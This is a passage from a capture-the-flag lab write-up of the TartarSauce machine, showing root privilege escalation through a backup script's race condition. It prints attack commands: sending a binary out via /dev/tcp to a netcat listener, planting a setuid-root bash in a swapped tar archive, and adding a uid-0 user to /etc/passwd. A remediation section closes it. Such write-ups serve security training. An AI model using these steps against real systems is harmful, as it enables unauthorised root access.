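    tar --no-same-owner -xzf "$tmpfile" -C "$check" 2>/dev/null || { rm -rf "$work"; return 1; }
    strip_special_bits "$check"
    # use diff's exit status directly instead of testing its stdout
    if ! diff -r "$src" "$check/${src#/}" >/dev/null 2>&1; then
        rm -rf "$work"     # never leave the extracted tree behind
        return 4
    fi
    mv "$tmpfile" "$dest" && rm -rf "$work"
}
```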

To exploit this, we first exfiltrate the target's 32-bit bash binary to our attack machine, using a netcat listener on our side.

┌──(kali㉿kali)-[~/Downloads/var/www/html]                                                                                                                     
└─$ nc -nvlp 5555 > bash                                                                                                                                       
listening on [any] 5555 ...

On the target machine we then run:

onuma@TartarSauce:/bin$ cat /bin/bash > /dev/tcp/10.10.14.36/5555

With the 32-bit bash binary on our machine, we change its ownership to the root user and set the setuid bit on it.

┌──(kali㉿kali)-[~]
└─$ sudo chown root:root bash                                                                                                                              1 ⨯
                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sudo chmod u+s bash 

We now recreate the var/www/html folder structure, move the bash binary into it, and create a tar archive of the directory.

┌──(kali㉿kali)-[~/Downloads]
└─$ mkdir -p var/www/html

┌──(kali㉿kali)-[~/Downloads]
└─$ mv bash var/www/html

┌──(kali㉿kali)-[~/Downloads]
└─$ tar -cvzf bash.tar.gz var       
var/
var/www/
var/www/html/
var/www/html/bash

After transferring the tar file to the target, we wait until backuperer starts its run and then, during its 30-second sleep, overwrite the temporary backup archive in /var/tmp (the hidden file with the random name) with our tar file.

onuma@TartarSauce:/var/tmp$ cp bash.tar.gz .7930a232698058466d22f1bb33986ec9f78631be
onuma@TartarSauce:/var/tmp$ ls -la
total 1048                                                                     
drwxrwxrwt 10 root  root    4096 Oct 29 13:53 .
drwxr-xr-x 14 root  root    4096 May 12 06:55 ..
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:53 .7930a232698058466d22f1bb33986ec9f78631be
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:50 bash.tar.gz                                                                                                      
drwx------  3 root  root    4096 May 12 06:55 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------  3 root  root    4096 May 12 06:55 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ
drwx------  3 root  root    4096 May 12 06:55 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R
drwx------  3 root  root    4096 May 12 06:55 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td
drwx------  3 root  root    4096 May 12 06:55 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER
drwx------  3 root  root    4096 Oct 29 06:28 systemd-private-d81ab013afe44ca093eb522e178dcde3-systemd-timesyncd.service-rls9tR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX

Once the script has extracted our archive into the check folder, we can navigate into it and run the bash binary with the -p flag, which keeps the setuid effective user ID, to get root privileges.

onuma@TartarSauce:/var/tmp$ ls -la
total 1052
drwxrwxrwt 11 root  root    4096 Oct 29 13:53 .
drwxr-xr-x 14 root  root    4096 May 12 06:55 ..
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:53 .7930a232698058466d22f1bb33986ec9f78631be
-rw-r--r--  1 onuma onuma 512044 Oct 29 13:50 bash.tar.gz
drwxr-xr-x  3 root  root    4096 Oct 29 13:53 check
drwx------  3 root  root    4096 May 12 06:55 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------  3 root  root    4096 May 12 06:55 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ
drwx------  3 root  root    4096 May 12 06:55 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R
drwx------  3 root  root    4096 May 12 06:55 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td
drwx------  3 root  root    4096 May 12 06:55 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER
drwx------  3 root  root    4096 Oct 29 06:28 systemd-private-d81ab013afe44ca093eb522e178dcde3-systemd-timesyncd.service-rls9tR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX
onuma@TartarSauce:/var/tmp$ cd check
onuma@TartarSauce:/var/tmp/check$ cd var/www/html
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -la
total 1092
drwxr-xr-x 2 onuma onuma    4096 Oct 29 13:42 .
drwxr-xr-x 3 onuma onuma    4096 Oct 29 12:57 ..
-rwsr-xr-x 1 root  root  1109564 Oct 29 13:42 bash
onuma@TartarSauce:/var/tmp/check/var/www/html$ bash -p
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./bash -p
bash-4.3# id
uid=1000(onuma) gid=1000(onuma) euid=0(root) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

With an effective UID of 0 we can edit /etc/passwd; by adding a second user with uid and gid 0 and switching to it, we get a full root shell.

bash-4.3# /bin/su root2
Password: testing

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@TartarSauce:/var/tmp/check/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

Remediation

Vulnerable WordPress plugins such as the outdated Gwolle Guestbook should be upgraded to patched versions or removed.

Passwordless sudo privileges should not be granted for the tar binary: its --checkpoint-action option lets it execute arbitrary commands as the target user.

The backuperer script should be rewritten so that unprivileged users have no opportunity to overwrite the archive it later extracts as root; in particular it should not stage that archive in the world-writable /var/tmp.

Finally, the OS and applications should be patched and updated to the latest versions where possible, to mitigate the risk of other exploits.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.